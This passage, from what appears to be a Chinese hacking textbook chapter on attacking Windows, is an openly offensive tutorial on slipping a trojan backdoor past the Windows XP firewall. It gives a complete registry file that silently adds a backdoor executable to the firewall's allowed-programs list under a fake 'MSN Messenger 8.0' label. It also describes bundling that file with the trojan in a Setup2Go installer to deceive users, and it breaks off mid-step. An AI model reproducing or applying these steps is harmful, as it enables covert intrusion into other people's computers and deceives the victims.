攻击Windows系统要点.docVIP

第3部分 攻击系统 第5章 攻击Windows系统 越发古老的Windows，每天崭新的系统漏洞； 麻木不仁的Windows用户，如鱼得水的黑客…… ——这就是Windows世界的悲喜剧？ 黑客无处不在，无时不在； 世界无可不黑，无不可黑…… 5.1 攻击Windows系统 相信没有人没有听说过Windows系统的漏洞问题。尽管从Windows 98发展到Windows XP/Windows 2003，微软也一直没有停止过对Windows安全性的加强，但长久以来，Windows的安全性能总是稍逊黑客一筹，各种安全措施总是差那么一点而不能到位。 Windows环境下值得黑客攻击的地方实在太多，最典型的如Windows防火墙、Windows管理员（或其他账户）口令、Windows最新漏洞的利用等。以下从一些典型的方面进行说明。 5.1.1 攻击Windows防火墙 Windows XP自带了防火墙，这个不要钱的东西虽然离真正的防火墙在黑客眼里还差十万八千里，但其在我们的入侵行动中却也给我们的木马后门带来巨大的不便，成为我们入侵Windows时的头号绊脚石，必须干掉它或者绕过它！ 绕过Windows防火墙的简单办法 Windows防火墙采取了极不负责任的验证方式： 任何应用程序在试图连接网络时，Windows防火墙驱动会先将该程序与允许列表试图匹配，如果没有发现允许列表中有这个程序，则就弹出是否允许该程序访问网络的对话框。如果用户选择了“是”，它就自动将该程序的路径和文件名记录到注册表的特定键值中，并且做好允许访问的标志。 既然这些认证信息被保存在注册表中，而且它只会记录程序的路径和文件名，那么想悄悄绕过它就不难了。大体思路如下： 捆绑文件→安装时修改注册表→执行木马后门程序 以下分别举两种方便好用的方法为例。 【例一】 使用Setup2Go安装程序绕过防火墙 Setup2Go是一款便利的安装程序制作工具，能够用它生成自己的安装程序，我们就正是利用了它的植入文件和修改注册表的特性达到目的。当然，你也完全可以使用其他类似功能的安装程序制作工具。 第一步：准备注册表文件。 用记事本将如下内容输入并保存为一个扩展名为 .reg的注册表文件，比如C:\KillFW.reg ： Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] C:\\Windows\\System32\\backdoor.exe=C:\\Windows\\System32\\backdoor.exe:*:Enabled:MSN Messenger 8.0 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] C:\\Windows\\System32\\backdoor.exe=C:\\Windows\\System32\\backdoor.exe:*:Enabled:MSN Messenger 8.0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] C:\\Windows\\System32\\backdoor.exe=C:\\Windows\\System32\\backdoor.exe:*:Enabled:MSN Messenger 8.0 注意：上述注册表内容中，“C:\\Windows\\System32\\backdoor.exe”是木马后门的路径和文件名（当然实际使用时是没有哪个傻瓜会把自己的木马后门命名为backdoor.exe的），实际使用时替换成你的木马将要保存的位置和文件名；“MSN Messenger 8.0”为Windows防火墙例外列表中显示的名称，比如这里我们为了具有一定欺骗效果，使用了“MSN Messenger 8.0”这个名称，以便让用户误以为是MSN Messenger 7.5的升级版本。具体要如何伪装，得结合当时流行的程序、版本、用户习惯等灵活设计。 第二步：制作捆绑安装程序。 启动Setup2G